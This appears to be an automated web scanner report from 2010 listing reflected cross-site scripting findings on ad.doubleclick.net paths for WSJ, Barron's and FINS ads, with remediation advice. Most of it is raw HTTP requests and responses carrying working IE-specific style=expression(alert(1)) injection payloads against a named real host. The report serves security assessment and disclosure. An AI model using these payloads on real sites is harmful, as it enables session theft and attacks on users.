Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defenses:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 47f00"style%3d"x%3aexpression(alert(1))"043a1994120 was submitted in the !category parameter. This input was echoed as 47f00"style="x:expression(alert(1))"043a1994120 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/barrons.com/public_front;!category=;;mc=0;tile=4;sz=263x32;ord=2459245924592459;47f00"style%3d"x%3aexpression(alert(1))"043a1994120 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.barrons.com/home-page Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 06 Nov 2010 16:06:02 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 607
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/b;231259931;0-0;0;13405531;31977-263/32;31308648/31326524/1;;~okv=;!category=;;mc=0;tile=4;sz=263x32;47f00"style="x:expression(alert(1))"043a1994120;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/pubs/D2/BSW/Microsite_Index.jsp?cds_page_id=53753&cds_mag_code=BSW&cds_response_key=W9EBBBAA"> ...[SNIP]...
The value of the 1d915%22style%3d%22x%3aexpression(alert(1))%22023bd0a1937 request parameter is copied into the value of an HTML tag attribute which is not encapsulated in any quotation marks. The payload e5ec9%20style%3dx%3aexpression(alert(1))%20c4750a0a15d was submitted in the 1d915%22style%3d%22x%3aexpression(alert(1))%22023bd0a1937 parameter. This input was echoed as e5ec9 style=x:expression(alert(1)) c4750a0a15d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 06 Nov 2010 17:06:13 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 656
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/r;231259931;0-0;0;13405531;31977-263/32;31308648/31326524/1;;~okv=;!category=;;mc=0;tile=4;sz=263x32;&1d915"style="x:expression(alert(1))"023bd0a1937=1e5ec9 style=x:expression(alert(1)) c4750a0a15d;~aopt=2/1/a8/1;~sscs=%3fhttps://w1.buysub.com/pubs/D2/BSW/Microsite_Index.jsp?cds_page_id=53753&cds_mag_code=BSW&cds_response_key=W9EBBBAA"> ...[SNIP]...
1.3. http://ad.doubleclick.net/adi/barrons.com/public_front [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/barrons.com/public_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1d915"style%3d"x%3aexpression(alert(1))"023bd0a1937 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 1d915"style="x:expression(alert(1))"023bd0a1937 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/barrons.com/public_front;!category=;;mc=0;tile=4;sz=263x32;ord=2459245924592459;&1d915"style%3d"x%3aexpression(alert(1))"023bd0a1937=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.barrons.com/home-page Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sat, 06 Nov 2010 16:06:52 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 610
<head><title>Click here to find out more!</title><base href="http://ad.doubleclick.net"></head><body bgcolor="white"><a target="_blank" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/b;231259931;0-0;0;13405531;31977-263/32;31308648/31326524/1;;~okv=;!category=;;mc=0;tile=4;sz=263x32;&1d915"style="x:expression(alert(1))"023bd0a1937=1;~aopt=2/1/ff/1;~sscs=%3fhttps://w1.buysub.com/pubs/D2/BSW/Microsite_Index.jsp?cds_page_id=53753&cds_mag_code=BSW&cds_response_key=W9EBBBAA"> ...[SNIP]...
1.4. http://ad.doubleclick.net/adi/fins.com/tech [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/fins.com/tech
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9524a"style%3d"x%3aexpression(alert(1))"2cc2cb1b1d9 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9524a"style="x:expression(alert(1))"2cc2cb1b1d9 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/fins.com/tech?9524a"style%3d"x%3aexpression(alert(1))"2cc2cb1b1d9=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2920533/626558/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 646 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:12:46 GMT Expires: Sat, 06 Nov 2010 16:12:46 GMT Connection: close
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_new" href="http://ad.doubleclick.net/click;h=v8/3a4a/0/0/%2a/p;230900558;0-0;0;52244699;255-0/0;38800450/38818207/1;;~okv=;9524a"style="x:expression(alert(1))"2cc2cb1b1d9=1;~aopt=2/1/a8/1;~sscs=%3fhttp://it-jobs.fins.com/Technology-Job-Results.aspx?link=FINS_jobs_relatedjobs&SearchType=advanced&Source=content&CompanyId=4461&CompanyName=Microsoft+Corp"> ...[SNIP]...
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload dbf2d"style%3d"x%3aexpression(alert(1))"7e8ac526757 was submitted in the sz parameter. This input was echoed as dbf2d"style="x:expression(alert(1))"7e8ac526757 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/fins.com/tech;sz=dbf2d"style%3d"x%3aexpression(alert(1))"7e8ac526757 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://it-jobs.fins.com/?reflink=djm_bcu_tech_x140 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 556 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:07:20 GMT Expires: Sun, 07 Nov 2010 06:07:20 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_new" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/u;231422590;0-0;0;52244699;255-0/0;38961053/38978810/1;;~okv=;sz=dbf2d"style="x:expression(alert(1))"7e8ac526757;~aopt=2/1/ff/1;~sscs=%3fhttp://www.microsoft-careers.com/go/IEB-&-MCB/242064/?utm_campaign=FINSmobile"> ...[SNIP]...
The value of the tn request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d7d2f"style%3d"x%3aexpression(alert(1))"f406f78a44b was submitted in the tn parameter. This input was echoed as d7d2f"style="x:expression(alert(1))"f406f78a44b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/fins.com/tech;tn=d7d2f"style%3d"x%3aexpression(alert(1))"f406f78a44b HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://it-jobs.fins.com/?reflink=djm_bcu_tech_x140 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 519 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:06:14 GMT Expires: Sun, 07 Nov 2010 06:06:14 GMT
<html><head><title>Click here to find out more!</title></head><body bgcolor=#ffffff marginwidth=0 marginheight=0 leftmargin=0 topmargin=0><a target="_new" href="http://ad.doubleclick.net/click;h=v8/3a4b/0/0/%2a/u;231259828;0-0;0;52244699;255-0/0;38962299/38980056/1;;~okv=;tn=d7d2f"style="x:expression(alert(1))"f406f78a44b;~aopt=2/1/ff/1;~sscs=%3fhttp://www.technisource.com/search/"> ...[SNIP]...
1.7. http://ad.doubleclick.net/adi/interactive.wsj.com/ [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 7d75b"style%3d"x%3aexpression(alert(1))"6456b4e6ccc was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 7d75b"style="x:expression(alert(1))"6456b4e6ccc in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/?7d75b"style%3d"x%3aexpression(alert(1))"6456b4e6ccc=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 456 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:20:51 GMT Expires: Sun, 07 Nov 2010 09:20:51 GMT Connection: close
1.8. http://ad.doubleclick.net/adi/interactive.wsj.com/default [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/default
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f8e8c"%20a%3db%20acaa71c9afa was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as f8e8c" a=b acaa71c9afa in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/interactive.wsj.com/default?f8e8c"%20a%3db%20acaa71c9afa=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2920533/626558/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 431 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 03:47:36 GMT Expires: Sun, 07 Nov 2010 03:47:36 GMT Connection: close
1.9. http://ad.doubleclick.net/adi/interactive.wsj.com/default [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/default
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2bbae"%20style%3dx%3aexpression(alert(1))%20637aa9fb3ae was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 2bbae" style=x:expression(alert(1)) 637aa9fb3ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/default?2bbae"%20style%3dx%3aexpression(alert(1))%20637aa9fb3ae=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2920533/626558/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 456 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:12:37 GMT Expires: Sat, 06 Nov 2010 16:12:37 GMT Connection: close
1.10. http://ad.doubleclick.net/adi/interactive.wsj.com/front_nonsub [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/front_nonsub
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 61f9c"%20style%3dx%3aexpression(alert(1))%2033eb3ea8620 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 61f9c" style=x:expression(alert(1)) 33eb3ea8620 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/front_nonsub?61f9c"%20style%3dx%3aexpression(alert(1))%2033eb3ea8620=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058||t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 457 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 03:07:33 GMT Expires: Sat, 06 Nov 2010 03:07:33 GMT Connection: close
The value of the !category request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3b7c9"%20a%3db%20d834c3558b6 was submitted in the !category parameter. This input was echoed as 3b7c9" a=b d834c3558b6 in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/interactive.wsj.com/markets_front;!category=3b7c9"%20a%3db%20d834c3558b6 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.wsj.com/public/page/news-financial-markets-stock.html?mod=WSJ_topnav_markets_main Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 440 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 05:59:27 GMT Expires: Sun, 07 Nov 2010 05:59:27 GMT
1.12. http://ad.doubleclick.net/adi/interactive.wsj.com/markets_front [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/markets_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4d558"%20style%3dx%3aexpression(alert(1))%2078f613ce975 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 4d558" style=x:expression(alert(1)) 78f613ce975 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/markets_front?4d558"%20style%3dx%3aexpression(alert(1))%2078f613ce975=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 457 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:11:05 GMT Expires: Sat, 06 Nov 2010 16:11:05 GMT Connection: close
1.13. http://ad.doubleclick.net/adi/interactive.wsj.com/microsite_hsbcemi [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/microsite_hsbcemi
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5af3c"style%3d"x%3aexpression(alert(1))"afc5bf67239 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 5af3c"style="x:expression(alert(1))"afc5bf67239 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/microsite_hsbcemi;sz=300x250;ord=123456789?&5af3c"style%3d"x%3aexpression(alert(1))"afc5bf67239=1 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.wsj.com/ad/emi Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Date: Sun, 07 Nov 2010 06:17:41 GMT Cache-Control: private, x-gzip-ok="" Content-Length: 652
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e76b7"style%3d"x%3aexpression(alert(1))"19ddf51cf31 was submitted in the sz parameter. This input was echoed as e76b7"style="x:expression(alert(1))"19ddf51cf31 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/microsite_hsbcemi;sz=e76b7"style%3d"x%3aexpression(alert(1))"19ddf51cf31 HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://online.wsj.com/ad/emi Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 458 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:16:51 GMT Expires: Sun, 07 Nov 2010 06:16:51 GMT
The value of the sz request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9ea4e"%20a%3db%2030418e91b1b was submitted in the sz parameter. This input was echoed as 9ea4e" a=b 30418e91b1b in the application's response.
This behaviour demonstrates that it is possible to inject new attributes into an existing HTML tag. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /adi/interactive.wsj.com/microsite_supplychainrisk;sz=9ea4e"%20a%3db%2030418e91b1b HTTP/1.1 Host: ad.doubleclick.net Proxy-Connection: keep-alive Referer: http://www.supplychainriskinsights.com/ Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.7 (KHTML, like Gecko) Chrome/7.0.517.44 Safari/534.7 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: id=228ef07ef3000058|2579983/399676/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 433 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 06:19:51 GMT Expires: Sun, 07 Nov 2010 06:19:51 GMT
1.16. http://ad.doubleclick.net/adi/interactive.wsj.com/smb_front [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/smb_front
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9e302"%20style%3dx%3aexpression(alert(1))%20a99274248e7 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 9e302" style=x:expression(alert(1)) a99274248e7 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/smb_front?9e302"%20style%3dx%3aexpression(alert(1))%20a99274248e7=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2761768/958300/14920,2569617/889517/14920,865138/559931/14920,2579983/399676/14920,1365243/27115/14920,2754094/177071/14920,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 457 Cache-Control: no-cache Pragma: no-cache Date: Sun, 07 Nov 2010 09:11:42 GMT Expires: Sun, 07 Nov 2010 09:11:42 GMT Connection: close
1.17. http://ad.doubleclick.net/adi/interactive.wsj.com/sports_interactive [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://ad.doubleclick.net
Path:
/adi/interactive.wsj.com/sports_interactive
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d4a27"style%3d"x%3aexpression(alert(1))"de4c8fecc35 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as d4a27"style="x:expression(alert(1))"de4c8fecc35 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.
Request
GET /adi/interactive.wsj.com/sports_interactive?d4a27"style%3d"x%3aexpression(alert(1))"de4c8fecc35=1 HTTP/1.1 Host: ad.doubleclick.net Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: id=228ef07ef3000058|2920533/626558/14919,1174169/13503/14919|t=1286682537|et=730|cs=qi8o9zoc;
Response
HTTP/1.1 200 OK Server: DCLK-AdSvr Content-Type: text/html Content-Length: 457 Cache-Control: no-cache Pragma: no-cache Date: Sat, 06 Nov 2010 16:12:36 GMT Expires: Sat, 06 Nov 2010 16:12:36 GMT Connection: close
